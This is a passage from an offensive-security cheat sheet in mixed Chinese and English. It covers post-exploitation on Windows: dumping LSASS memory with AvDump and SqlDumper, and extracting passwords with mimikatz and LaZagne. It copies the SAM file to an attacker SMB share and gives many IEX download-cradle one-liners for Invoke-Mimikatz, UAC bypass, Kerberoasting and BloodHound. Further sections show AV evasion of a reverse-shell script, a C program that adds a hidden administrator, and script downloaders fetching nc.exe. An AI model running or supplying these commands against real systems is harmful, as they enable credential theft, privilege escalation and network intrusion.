.\AvDump.exe --pid 704 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file C:\Windows\temp\file.dmp

## ------------------| Metasploit post exploitation module 
post/windows/gather/avast_memory_dump

• 使用SqlDumper

## ------------------| Download 
wget https://github.com/f1tz/Misc/raw/master/SqlDumper/SqlDumper_2008R2_x86.zip
wget https://github.com/f1tz/Misc/raw/master/SqlDumper/SqlDumper_2008R2_x64.zip

## ------------------| Execute
.\sqldumper.exe [lsass's pid] 0 0x0110

## ------------------| Extract passwords
mimikatz.exe "log" "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit

• laZagne.exe [火狐、Chrome]

wget https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe
.\laZagne.exe all

01.13 其他

• smb从服务器复制文件

## ------------------| Start SMB Server
impacket-smbserver <shareName> <sharePath>
impacket-smbserver share $(pwd) -smb2support
impacket-smbserver share $(pwd) -smb2support -username h4rithd -password Password123      

## ------------------| 使用cmd装载共享
net use z: <MyIP>\share
net use z: \\<MyIP>\share /USER:h4rithd Password123

## ------------------| 使用powershell装载共享
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('h4rithd', $pass)
New-PSDrive -Name h4rithd -PSProvider FileSystem -Credential $cred -Root \\<MyIP>\share
cd h4rithd:
dir

## ------------------| Direct copy
copy C:\Users\Public\sam \\10.10.14.26\share\sam
xcopy C:\Users\Public\sam \\10.10.14.26\share\sam

• 在 Linux 上启动SMBsamba 服务器以共享文件。

## ------------------| From using Impacket-smbserver 
impacket-smbserver share .
# 如果出现错误“您的系统需要SMB2或更高版本”，则运行以下命令
impacket-smbserver share . -smb2support 

## ------------------| From using Linux default SMBA
## Backup current settings 
sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
## 为smb位置创建目录并授予权限
mkdir -p /tmp/smb
chmod 0777 /tmp/smb
## Config smba for share
echo "\n\n#### --- $(hostname) was edits below lines ----\n
[share] \n \
\tpath = /tmp/smb \n \
\tpublic = yes \n \
\twritable = yes \n \
\tcomment = $(hostname) shares \n \
\tprintable = no \n \
\tguest ok = yes \n \
#### --- Edit done -------" >> /etc/samba/smb.conf
## Verify configs
tail 10 /etc/samba/smb.conf
## Start smb service
sudo service smbd restart

## ** 请注意，完成后恢复设置！！！
cp /etc/samba/smb.conf.bak /etc/samba/smb.conf
service smbd restart

• 红队备忘单

## ------------------| 以其他用户身份运行Powershell提示符，不将配置文件加载到计算机[替换DOMAIN和user]
runas /user:DOMAIN\USER /noprofile powershell.exe

## ------------------| 插入注册表项以在较新版本的Windows上启用Wdigest
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1

## ------------------| 调用BypassUAC并以管理员身份启动PowerShell提示符[或替换以运行任何其他命令]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

## ------------------| Invoke-Mimikatz：从内存转储凭据
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

## ------------------| 导入Mimikatz模块以运行进一步的命令
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

## ------------------| 调用MassMimikatz：用于在远程主机上转储凭据[将$env:computername替换为目标服务器名称]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

## ------------------| 通电：权限提升检查
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”

## ------------------| 调用Inveigh并将输出记录到文件
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y  –Proxy Y -LogOutput Y -FileOutput Y"         

## ------------------| 调用Kerberoast并提供与Hashcat兼容的哈希
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

## ------------------| 调用ShareFinder并将输出打印到文件
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

## ------------------| 导入PowerView模块以运行更多命令
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

## ------------------| Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

02.防御规避技术

• AV 规避技术（调用混淆）

## ------------------| Basic setup
git clone https://github.com/danielbohannon/Invoke-Obfuscation
cd Invoke-Obfuscation
pwsh
Import-Module ./Invoke-Obfuscation.psd1
cd /tmp
Invoke-Obfuscation

## ------------------| 通过编码混淆整个命令
SET SCRIPTPATH /tmp/revshell.ps1
ENCODING
5
OUT /tmp/enc.ps1

## ------------------| 混淆PowerShell Ast节点（PS3.0+）
SET SCRIPTPATH /tmp/revshell.ps1
AST
ALL
1
OUT /tmp/enc.ps1

• 使用Shellter进行躲避

shellter
A ### For automatic mode
### you can do it your self. 

03.脚本

• 使用 c 添加新用户

#include <stdlib.h>

int main ()
{
    int user;
    user = system ("net user h4rithd Password! /add");
    user = system ("net localgroup administrators h4rithd /add");
    return 0;
}

## sudo i686-w64-mingw32-gcc adduser.c -o adduser.exe

• 获取ServiceACL.ps1

# download Get-ServiceACL.ps1 to the box and execute in memory
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.2/GetServiceACL.ps1',$false);$h.send();iex $h.responseText

# examine nscp service ACL
"nscp" | Get-ServiceAcl | select -ExpandProperty Access

• 调用-TSPingSweep.ps1

wget https://raw.githubusercontent.com/dwj7738/My-Powershell-Repository/master/Scripts/Invoke-TSPingSweep.ps1

IEX(New-Object Net.WebClient).downloadString('http://10.8.0.74/Invoke-TSPingSweep.ps1')
Invoke-TSPingSweep -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort

• Invoke-Portscan.ps1

## ------------------| Scan port 22
Invoke-Portscan -Hosts 172.16.249.1/24 -Ports 22 -Threads 30 | Where { $_.Alive -eq "True" }   

## ------------------| Scan other ports
Invoke-Portscan -Hosts 172.16.249.202 -Ports '21,22,80,443,8080'

• Invoke-AESEncryption.ps1

## ------------------| Import-Module
Import-Module .\Invoke-AESEncryption.ps1

## ------------------| Encrypt 
Invoke-AESEncryption.ps1 -Mode Encrypt -Key "h4rithd" -Path .\PlanText.txt

## ------------------| Decrypt 
Invoke-AESEncryption -Mode Decrypt -Key "h4rithd" -Path .\ciphertext.txt.aes

• 用于下载文件的wget脚本。

## ------------------| Create wget.js file
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

## ------------------| It can be executed as follows.
cscript /nologo wget.js http://10.10.14.25/nc.exe nc.exe

## ------------------| Create wget.vbs file
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

## ------------------| It can be executed as follows.
cscript /nologo wget.vbs http://10.10.14.25/nc.exe nc.exe